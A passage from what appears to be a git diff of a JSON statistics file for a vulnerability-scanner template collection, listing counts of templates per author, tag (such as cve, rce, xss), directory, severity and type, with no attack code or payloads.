(mah3sec_)","count":2},{"name":"0xelkomy","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"unstabl3","count":2},{"name":"mavericknerd","count":2},{"name":"shifacyclewala","count":2},{"name":"moritz nentwig","count":2},{"name":"emenalf","count":2},{"name":"kiblyn11","count":2},{"name":"ehsahil","count":2},{"name":"toufik airane","count":1},{"name":"kurohost","count":1},{"name":"soyelmago","count":1},{"name":"b4uh0lz","count":1},{"name":"streetofhackerr007","count":1},{"name":"nkxxkn","count":1},{"name":"_darrenmartyn","count":1},{"name":"fabaff","count":1},{"name":"rtcms","count":1},{"name":"mubassirpatel","count":1},{"name":"regala_","count":1},{"name":"ahmed sherif","count":1},{"name":"vzamanillo","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"furkansenan","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"jeya seelan","count":1},{"name":"divya_mudgal","count":1},{"name":"daviey","count":1},{"name":"_c0wb0y_","count":1},{"name":"rodnt","count":1},{"name":"patralos","count":1},{"name":"s1r1u5_","count":1},{"name":"notsoevilweasel","count":1},{"name":"bjhulst","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"geraldino2","count":1},{"name":"koti2","count":1},{"name":"nytr0gen","count":1},{"name":"apt-mirror","count":1},{"name":"0h1in9e","count":1},{"name":"shifacyclewla","count":1},{"name":"gal nagli","count":1},{"name":"0ut0fb4nd","count":1},{"name":"exploitation","count":1},{"name":"wabafet","count":1},{"name":"berkdusunur","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"elmahdi","count":1},{"name":"ooooooo_q","count":1},{"name":"d0rkerdevil","count":1},{"name":"its0x08","count":1},{"name":"gboddin","count":1},{"name":"yavolo","count":1},{"name":"r3naissance","count":1},{"name":"abison_binoy","count":1},{"name":"0xtavian","count":1},{"name":"taielab","count":1},{"name":"th3.d1p4k","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"sshell","count":1},{"name":"schniggie","count":1},{"name":"hanlaomo","count":1},{"name":"52971","count":1},{"name":"pdp","count":1},{"name":"_generic_human_","count":1},{"name":"cookiehanhoan","count":1},{"name":"ipanda","count":1},{"name":"kareemse1im","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"luskabol","count":1},{"name":"fmunozs","count":1},{"name":"tim_koopmans","count":1},{"name":"sullo","count":1},{"name":"ilovebinbash","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"naglinagli","count":1},{"name":"micha3lb3n","count":1},{"name":"yashgoti","count":1},{"name":"sicksec","count":1},{"name":"mhdsamx","count":1},{"name":"idealphase","count":1},{"name":"yashanand155","count":1},{"name":"flag007","count":1},{"name":"ldionmarcil","count":1},{"name":"ringo","count":1},{"name":"akash.c","count":1},{"name":"remonsec","count":1},{"name":"dudez","count":1},{"name":"johnjhacking","count":1},{"name":"raesene","count":1},{"name":"smaranchand","count":1},{"name":"arcc","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"blckraven","count":1},{"name":"dawid czarnecki","count":1},{"name":"hakluke","count":1},{"name":"johnk3r","count":1},{"name":"sy3omda","count":1},{"name":"c3l3si4n","count":1},{"name":"alph4byt3","count":1},{"name":"ajaysenr","count":1},{"name":"rojanrijal","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"iampritam","count":1},{"name":"knassar702","count":1},{"name":"chron0x","count":1},{"name":"0xrod","count":1},{"name":"akshansh","count":1},{"name":"bolli95","count":1},{"name":"mohammedsaneem","count":1},{"name":"@dwisiswant0","count":1},{"name":"alifathi-h1","count":1},{"name":"fopina","count":1},{"name":"thevillagehacker","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"bing0o","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"luci","count":1},{"name":"pudsec","count":1},{"name":"becivells","count":1},{"name":"andirrahmani1","count":1},{"name":"shreyapohekar","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j33n1k4","count":1},{"name":"dogasantos","count":1},{"name":"kabirsuda","count":1},{"name":"w4cky_","count":1},{"name":"affix","count":1},{"name":"defr0ggy","count":1},{"name":"tirtha_mandal","count":1},{"name":"ohlinge","count":1},{"name":"shelld3v","count":1},{"name":"thezakman","count":1},{"name":"undefl0w","count":1},{"name":"zandros0","count":1},{"name":"deena","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"qlkwej","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"mah3sec_","count":1},{"name":"alex","count":1},{"name":"omarkurt","count":1},{"name":"sickwell","count":1},{"name":"_harleo","count":1},{"name":"zhenwarx","count":1},{"name":"juicypotato1","count":1},{"name":"vsh00t","count":1},{"name":"alperenkesk","count":1}],"directory":[{"name":"home","count":1591}],"severity":[{"name":"info","count":453},{"name":"high","count":396},{"name":"medium","count":312},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":462},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":166},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":111},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":70},{"name":"token","count":63},{"name":"cve2018","count":61},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"network","count":32},{"name":"iot","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"logs","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"debug","count":13},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"fuzz","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"dns","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"cve2012","count":9},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"dlink","count":9},{"name":"gitlab","count":8},{"name":"ftp","count":8},{"name":"cve2013","count":8},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"airflow","count":8},{"name":"php","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"api","count":6},{"name":"google","count":6},{"name":"xxe","count":6},{"name":"nginx","count":6},{"name":"cms","count":6},{"name":"rails","count":6},{"name":"backup","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"lucee","count":5},{"name":"circarlife","count":5},{"name":"jetty","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"dell","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"login","count":5},{"name":"drupal","count":5},{"name":"ruijie","count":5},{"name":"phpmyadmin","count":5},{"name":"confluence","count":5},{"name":"laravel","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"router","count":4},{"name":"magmi","count":4},{"name":"netgear","count":4},{"name":"artifactory","count":4},{"name":"jolokia","count":4},{"name":"django","count":4},{"name":"cve2009","count":4},{"name":"thinkcmf","count":4},{"name":"ibm","count":4},{"name":"docker","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"samsung","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"fileupload","count":4},{"name":"elastic","count":4},{"name":"vpn","count":4},{"name":"nodejs","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"webserver","count":4},{"name":"amazon","count":3},{"name":"backups","count":3},{"name":"dedecms","count":3},{"name":"springcloud","count":3},{"name":"git","count":3},{"name":"log","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"crlf","count":3},{"name":"slack","count":3},{"name":"openssh","count":3},{"name":"nosqli","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"terramaster","count":3},{"name":"deserialization","count":3},{"name":"nacos","count":3},{"name":"microstrategy","count":3},{"name":"mongodb","count":3},{"name":"kubernetes","count":3},{"name":"printer","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"windows","count":3},{"name":"lfr","count":3},{"name":"oa","count":3},{"name":"kafka","count":3},{"name":"fanruan","count":3},{"name":"r-seenet","count":3},{"name":"grafana","count":3},{"name":"ebs","count":3},{"name":"ofbiz","count":3},{"name":"splunk","count":2},{"name":"nextjs","count":2},{"name":"natshell","count":2},{"name":"openfire","count":2},{"name":"sonarqube","count":2},{"name":"mail","count":2},{"name":"kentico","count":2},{"name":"telerik","count":2},{"name":"httpd","count":2},{"name":"wordfence","count":2},{"name":"service","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"chamilo","count":2},{"name":"hp","count":2},{"name":"sharepoint","count":2},{"name":"waf","count":2},{"name":"bitrix","count":2},{"name":"huawei","count":2},{"name":"intrusive","count":2},{"name":"activemq","count":2},{"name":"rockmongo","count":2},{"name":"microsoft","count":2},{"name":"zhiyuan","count":2},{"name":"sonicwall","count":2},{"name":"icewarp","count":2},{"name":"seeyon","count":2},{"name":"saltstack","count":2},{"name":"trixbox","count":2},{"name":"ucmdb","count":2},{"name":"spark","count":2},{"name":"cve2008","count":2},{"name":"fortios","count":2},{"name":"coldfusion","count":2},{"name":"hashicorp","count":2},{"name":"globalprotect","count":2},{"name":"shellshock","count":2},{"name":"prometheus","count":2},{"name":"kibana","count":2},{"name":"jboss","count":2},{"name":"keycloak","count":2},{"name":"xxljob","count":2},{"name":"nexus","count":2},{"name":"emerge","count":2},{"name":"couchdb","count":2},{"name":"leak","count":2},{"name":"ecology","count":2},{"name":"zabbix","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"webcam","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"showdoc","count":2},{"name":"glassfish","count":2},{"name":"hpe","count":2},{"name":"plesk","count":2},{"name":"mida","count":2},{"name":"cache","count":2},{"name":"openam","count":2},{"name":"injection","count":2},{"name":"rockethchat","count":2},{"name":"odoo","count":2},{"name":"smtp","count":2},{"name":"proxy","count":2},{"name":"vrealize","count":2},{"name":"oauth","count":2},{"name":"bigip","count":2},{"name":"frp","count":2},{"name":"pega","count":2},{"name":"flir","count":2},{"name":"maian","count":2},{"name":"paloalto","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"nagios","count":2},{"name":"exposures","count":2},{"name":"smb","count":2},{"name":"huijietong","count":1},{"name":"mobileiron","count":1},{"name":"bolt","count":1},{"name":"postgres","count":1},{"name":"dom","count":1},{"name":"timeclock","count":1},{"name":"redis","count":1},{"name":"grav","count":1},{"name":"redhat","count":1},{"name":"anchorcms","count":1},{"name":"rdp","count":1},{"name":"sarg","count":1},{"name":"springframework","count":1},{"name":"spectracom","count":1},{"name":"visionhub","count":1},{"name":"enum","count":1},{"name":"tongda","count":1},{"name":"harbor","count":1},{"name":"horde","count":1},{"name":"lotuscms","count":1},{"name":"symfony","count":1},{"name":"ambari","count":1},{"name":"plone","count":1},{"name":"centos","count":1},{"name":"apiman","count":1},{"name":"socomec","count":1},{"name":"fortinet","count":1},{"name":"zcms","count":1},{"name":"salesforce","count":1},{"name":"darkstat","count":1},{"name":"enumeration","count":1},{"name":"jsp","count":1},{"name":"ueditor","count":1},{"name":"mantisbt","count":1},{"name":"nedi","count":1},{"name":"openerp","count":1},{"name":"mailchimp","count":1},{"name":"etouch","count":1},{"name":"dlogin","count":1},{"name":"redwood","count":1},{"name":"linksys","count":1},{"name":"fuelcms","count":1},{"name":"jitsi","count":1},{"name":"xdcms","count":1},{"name":"fortilogger","count":1},{"name":"landray","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"wamp","count":1},{"name":"setup","count":1},{"name":"mediumish","count":1},{"name":"acexy","count":1},{"name":"opensns","count":1},{"name":"targa","count":1},{"name":"cve2005","count":1},{"name":"swagger","count":1},{"name":"cors","count":1},{"name":"zmanda","count":1},{"name":"mirai","count":1},{"name":"finereport","count":1},{"name":"zookeeper","count":1},{"name":"blind","count":1},{"name":"tenda","count":1},{"name":"pgadmin","count":1},{"name":"akamai","count":1},{"name":"mautic","count":1},{"name":"traefik","count":1},{"name":"octobercms","count":1},{"name":"fastapi","count":1},{"name":"kubeflow","count":1},{"name":"javafaces","count":1},{"name":"ssl","count":1},{"name":"svn","count":1},{"name":"episerver","count":1},{"name":"axis","count":1},{"name":"dotnetnuke","count":1},{"name":"bookstack","count":1},{"name":"thinkadmin","count":1},{"name":"cve2007","count":1},{"name":"node","count":1},{"name":"pacsone","count":1},{"name":"netis","count":1},{"name":"powercreator","count":1},{"name":"itop","count":1},{"name":"wp-theme","count":1},{"name":"b2evolution","count":1},{"name":"glances","count":1},{"name":"klog","count":1},{"name":"upload","count":1},{"name":"rujjie","count":1},{"name":"arl","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"webui","count":1},{"name":"expn","count":1},{"name":"blackboard","count":1},{"name":"nette","count":1},{"name":"drone","count":1},{"name":"szhe","count":1},{"name":"biometrics","count":1},{"name":"shopware","count":1},{"name":"ulterius","count":1},{"name":"rsyncd","count":1},{"name":"eyou","count":1},{"name":"extractor","count":1},{"name":"keenetic","count":1},{"name":"phpunit","count":1},{"name":"k8s","count":1},{"name":"jmx","count":1},{"name":"calendarix","count":1},{"name":"linkedin","count":1},{"name":"rubedo","count":1},{"name":"ems","count":1},{"name":"ntopng","count":1},{"name":"netsweeper","count":1},{"name":"bitly","count":1},{"name":"rabbitmq","count":1},{"name":"openrestry","count":1},{"name":"revision","count":1},{"name":"geddy","count":1},{"name":"yachtcontrol","count":1},{"name":"jsf","count":1},{"name":"cobub","count":1},{"name":"skywalking","count":1},{"name":"wuzhicms","count":1},{"name":"payara","count":1},{"name":"heroku","count":1},{"name":"tensorboard","count":1},{"name":"blue-ocean","count":1},{"name":"ioncube","count":1},{"name":"wiki","count":1},{"name":"ganglia","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"faraday","count":1},{"name":"tensorflow","count":1},{"name":"viewpoint","count":1},{"name":"mcafee","count":1},{"name":"emby","count":1},{"name":"bash","count":1},{"name":"bruteforce","count":1},{"name":"diris","count":1},{"name":"webmodule-ee","count":1},{"name":"db","count":1},{"name":"opencast","count":1},{"name":"feifeicms","count":1},{"name":"ecom","count":1},{"name":"tileserver","count":1},{"name":"zeroshell","count":1},{"name":"soar","count":1},{"name":"domxss","count":1},{"name":"discord","count":1},{"name":"bullwark","count":1},{"name":"nsasg","count":1},{"name":"druid","count":1},{"name":"codeigniter","count":1},{"name":"uwsgi","count":1},{"name":"acme","count":1},{"name":"beanshell","count":1},{"name":"hortonworks","count":1},{"name":"empirecms","count":1},{"name":"stem","count":1},{"name":"rhymix","count":1},{"name":"jeewms","count":1},{"name":"mpsec","count":1},{"name":"woocomernce","count":1},{"name":"xunchi","count":1},{"name":"adminer","count":1},{"name":"nc2","count":1},{"name":"flash","count":1},{"name":"subrion","count":1},{"name":"goahead","count":1},{"name":"kyan","count":1},{"name":"crm","count":1},{"name":"shopxo","count":1},{"name":"cloudflare","count":1},{"name":"igs","count":1},{"name":"primetek","count":1},{"name":"gloo","count":1},{"name":"cve2010","count":1},{"name":"monitorix","count":1},{"name":"nomad","count":1},{"name":"wooyun","count":1},{"name":"sitecore","count":1},{"name":"circontrorl","count":1},{"name":"selea","count":1},{"name":"panos","count":1},{"name":"parentlink","count":1},{"name":"lanproxy","count":1},{"name":"kerbynet","count":1},{"name":"nuuo","count":1},{"name":"sqlite","count":1},{"name":"rfi","count":1},{"name":"seacms","count":1},{"name":"javamelody","count":1},{"name":"aspnuke","count":1},{"name":"xml","count":1},{"name":"avtech","count":1},{"name":"myucms","count":1},{"name":"viewlinc","count":1},{"name":"ricoh","count":1},{"name":"ruby","count":1},{"name":"doh","count":1},{"name":"azure","count":1},{"name":"spidercontrol","count":1},{"name":"scs","count":1},{"name":"memcached","count":1},{"name":"totaljs","count":1},{"name":"phalcon","count":1},{"name":"majordomo2","count":1},{"name":"sidekiq","count":1},{"name":"fortigates","count":1},{"name":"wmt","count":1},{"name":"fortiweb","count":1},{"name":"dvwa","count":1},{"name":"dompdf","count":1},{"name":"zarafa","count":1},{"name":"robomongo","count":1},{"name":"moin","count":1},{"name":"jnoj","count":1},{"name":"smartsense","count":1},{"name":"vscode","count":1},{"name":"zm","count":1},{"name":"pyramid","count":1},{"name":"phpinfo","count":1},{"name":"panabit","count":1},{"name":"wso2","count":1},{"name":"circontrol","count":1},{"name":"floc","count":1},{"name":"tamronos","count":1},{"name":"zend","count":1},{"name":"haproxy","count":1},{"name":"jfrog","count":1},{"name":"esmtp","count":1},{"name":"yii","count":1},{"name":"csrf","count":1},{"name":"zimbra","count":1},{"name":"svnserve","count":1},{"name":"sentry","count":1},{"name":"hadoop","count":1},{"name":"webadmin","count":1},{"name":"ec2","count":1},{"name":"alibaba","count":1},{"name":"appweb","count":1},{"name":"nuxeo","count":1},{"name":"krweb","count":1},{"name":"ssltls","count":1},{"name":"liferay","count":1},{"name":"email","count":1},{"name":"wazuh","count":1},{"name":"landrayoa","count":1},{"name":"fedora","count":1},{"name":"plastic","count":1},{"name":"checkpoint","count":1},{"name":"clave","count":1},{"name":"jquery","count":1},{"name":"maccmsv10","count":1},{"name":"gateone","count":1},{"name":"synnefo","count":1},{"name":"weiphp","count":1},{"name":"upnp","count":1},{"name":"st","count":1},{"name":"gridx","count":1},{"name":"servicedesk","count":1},{"name":"saltapi","count":1},{"name":"trilithic","count":1},{"name":"aura","count":1},{"name":"fastcgi","count":1},{"name":"csod","count":1},{"name":"labtech","count":1},{"name":"concrete","count":1},{"name":"status","count":1},{"name":"tika","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"grails","count":1},{"name":"mdb","count":1},{"name":"vsphere","count":1},{"name":"pulsesecure","count":1},{"name":"vsftpd","count":1},{"name":"netrc","count":1},{"name":"wifisky","count":1},{"name":"74cms","count":1},{"name":"dotnet","count":1},{"name":"backdoor","count":1},{"name":"fiori","count":1},{"name":"lansweeper","count":1},{"name":"chinaunicom","count":1},{"name":"exchange","count":1},{"name":"duomicms","count":1},{"name":"firebase","count":1},{"name":"realteo","count":1},{"name":"opensmtpd","count":1},{"name":"rmc","count":1},{"name":"sprintful","count":1},{"name":"xiuno","count":1},{"name":"tapestry","count":1},{"name":"livezilla","count":1},{"name":"spring","count":1},{"name":"openstack","count":1},{"name":"k8","count":1},{"name":"gitlist","count":1},{"name":"codemeter","count":1},{"name":"idemia","count":1},{"name":"mysql","count":1},{"name":"jenkin","count":1},{"name":"portainer","count":1},{"name":"plc","count":1},{"name":"spf","count":1},{"name":"sco","count":1},{"name":"octoprint","count":1},{"name":"oscommerce","count":1},{"name":"optiLink","count":1},{"name":"netdata","count":1},{"name":"avalanche","count":1},{"name":"webftp","count":1},{"name":"opm","count":1},{"name":"zenario","count":1},{"name":"kafdrop","count":1},{"name":"gogs","count":1},{"name":"emc","count":1},{"name":"alertmanager","count":1},{"name":"cocoon","count":1},{"name":"pippoint","count":1},{"name":"nordex","count":1},{"name":"timesheet","count":1},{"name":"mara","count":1},{"name":"alerta","count":1},{"name":"2014","count":1},{"name":"erp-nc","count":1},{"name":"kong","count":1},{"name":"nexusdb","count":1},{"name":"ns","count":1},{"name":"dvr","count":1},{"name":"plugin","count":1},{"name":"turbocrm","count":1},{"name":"linkerd","count":1},{"name":"npm","count":1},{"name":"embedthis","count":1},{"name":"fortigate","count":1},{"name":"servicenow","count":1},{"name":"lancom","count":1},{"name":"cse","count":1},{"name":"proftpd","count":1},{"name":"triconsole","count":1},{"name":"comodo","count":1},{"name":"webmin","count":1},{"name":"cloudinary","count":1},{"name":"metinfo","count":1},{"name":"geutebruck","count":1},{"name":"clockwatch","count":1},{"name":"discourse","count":1},{"name":"mongo","count":1},{"name":"nps","count":1},{"name":"wavemaker","count":1},{"name":"htmli","count":1},{"name":"cgi","count":1},{"name":"zte","count":1},{"name":"varnish","count":1},{"name":"xff","count":1},{"name":"razor","count":1},{"name":"opentsdb","count":1},{"name":"ilo4","count":1},{"name":"clusterengine","count":1},{"name":"jenzabar","count":1},{"name":"postmessage","count":1},{"name":"flink","count":1},{"name":"moinmoin","count":1},{"name":"node-red-dashboard","count":1},{"name":"favicon","count":1},{"name":"zzzcms","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":78},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"pr3r00t","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"wdahlenb","count":8},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"r3dg33k","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"melbadry9","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"that_juan_","count":7},{"name":"0x240x23elu","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"caspergn","count":5},{"name":"rootxharsh","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"tess","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"binaryfigments","count":3},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"swissky","count":2},{"name":"pxmme1337","count":2},{"name":"emenalf","count":2},{"name":"kiblyn11","count":2},{"name":"lu4nx","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"0xprial","count":2},{"name":"0xrudra","count":2},{"name":"0xsapra","count":2},{"name":"shifacyclewala","count":2},{"name":"incogbyte","count":2},{"name":"elsfa7110","count":2},{"name":"davidmckennirey","count":2},{"name":"joeldeleep","count":2},{"name":"0xelkomy","count":2},{"name":"udit_thakkur","count":2},{"name":"ehsahil","count":2},{"name":"unstabl3","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"random-robbie","count":2},{"name":"gevakun","count":2},{"name":"zomsop82","count":2},{"name":"ree4pwn","count":2},{"name":"jarijaas","count":2},{"name":"foulenzer","count":2},{"name":"moritz nentwig","count":2},{"name":"0xcrypto","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"mavericknerd","count":2},{"name":"amsda","count":2},{"name":"streetofhackerr007","count":1},{"name":"_generic_human_","count":1},{"name":"mah3sec_","count":1},{"name":"wabafet","count":1},{"name":"c3l3si4n","count":1},{"name":"abison_binoy","count":1},{"name":"elmahdi","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"alex","count":1},{"name":"daviey","count":1},{"name":"yavolo","count":1},{"name":"micha3lb3n","count":1},{"name":"notsoevilweasel","count":1},{"name":"dudez","count":1},{"name":"koti2","count":1},{"name":"hakluke","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"juicypotato1","count":1},{"name":"thezakman","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"fopina","count":1},{"name":"nytr0gen","count":1},{"name":"w4cky_","count":1},{"name":"thevillagehacker","count":1},{"name":"mubassirpatel","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"berkdusunur","count":1},{"name":"ringo","count":1},{"name":"bjhulst","count":1},{"name":"b4uh0lz","count":1},{"name":"kareemse1im","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kurohost","count":1},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"whynotke","count":1},{"name":"omarkurt","count":1},{"name":"0h1in9e","count":1},{"name":"sy3omda","count":1},{"name":"regala_","count":1},{"name":"j33n1k4","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ooooooo_q","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"manuelbua","count":1},{"name":"cookiehanhoan","count":1},{"name":"mhdsamx","count":1},{"name":"rojanrijal","count":1},{"name":"furkansenan","count":1},{"name":"blckraven","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"vsh00t","count":1},{"name":"undefl0w","count":1},{"name":"0xrod","count":1},{"name":"52971","count":1},{"name":"gal nagli","count":1},{"name":"iampritam","count":1},{"name":"knassar702","count":1},{"name":"th3.d1p4k","count":1},{"name":"_harleo","count":1},{"name":"becivells","count":1},{"name":"shifacyclewla","count":1},{"name":"flag007","count":1},{"name":"patralos","count":1},{"name":"ilovebinbash","count":1},{"name":"r3naissance","count":1},{"name":"sullo","count":1},{"name":"chron0x","count":1},{"name":"@dwisiswant0","count":1},{"name":"co0nan","count":1},{"name":"_c0wb0y_","count":1},{"name":"sickwell","count":1},{"name":"defr0ggy","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"hanlaomo","count":1},{"name":"jeya seelan","count":1},{"name":"fabaff","count":1},{"name":"zandros0","count":1},{"name":"apt-mirror","count":1},{"name":"taielab","count":1},{"name":"yashgoti","count":1},{"name":"remonsec","count":1},{"name":"bing0o","count":1},{"name":"tirtha_mandal","count":1},{"name":"divya_mudgal","count":1},{"name":"qlkwej","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ajaysenr","count":1},{"name":"sshell","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"its0x08","count":1},{"name":"schniggie","count":1},{"name":"alifathi-h1","count":1},{"name":"pudsec","count":1},{"name":"nkxxkn","count":1},{"name":"pdp","count":1},{"name":"kabirsuda","count":1},{"name":"shreyapohekar","count":1},{"name":"mohammedsaneem","count":1},{"name":"dawid czarnecki","count":1},{"name":"raesene","count":1},{"name":"0ut0fb4nd","count":1},{"name":"smaranchand","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"exploitation","count":1},{"name":"_darrenmartyn","count":1},{"name":"zhenwarx","count":1},{"name":"alperenkesk","count":1},{"name":"0xtavian","count":1},{"name":"ohlinge","count":1},{"name":"shelld3v","count":1},{"name":"akshansh","count":1},{"name":"gboddin","count":1},{"name":"affix","count":1},{"name":"rtcms","count":1},{"name":"toufik airane","count":1},{"name":"sicksec","count":1},{"name":"ldionmarcil","count":1},{"name":"arcc","count":1},{"name":"idealphase","count":1},{"name":"naglinagli","count":1},{"name":"johnjhacking","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"andirrahmani1","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"dogasantos","count":1},{"name":"bolli95","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"vzamanillo","count":1},{"name":"rodnt","count":1},{"name":"noamrathaus","count":1},{"name":"deena","count":1},{"name":"s1r1u5_","count":1},{"name":"bad5ect0r","count":1},{"name":"ipanda","count":1},{"name":"akash.c","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ahmed sherif","count":1},{"name":"johnk3r","count":1}],"directory":[{"name":"cves","count":468},{"name":"vulnerabilities","count":234},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":396},{"name":"medium","count":312},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 942ea53ea9..7fcd055cf6 100644 --- a/TEMPLATES-STATS.md 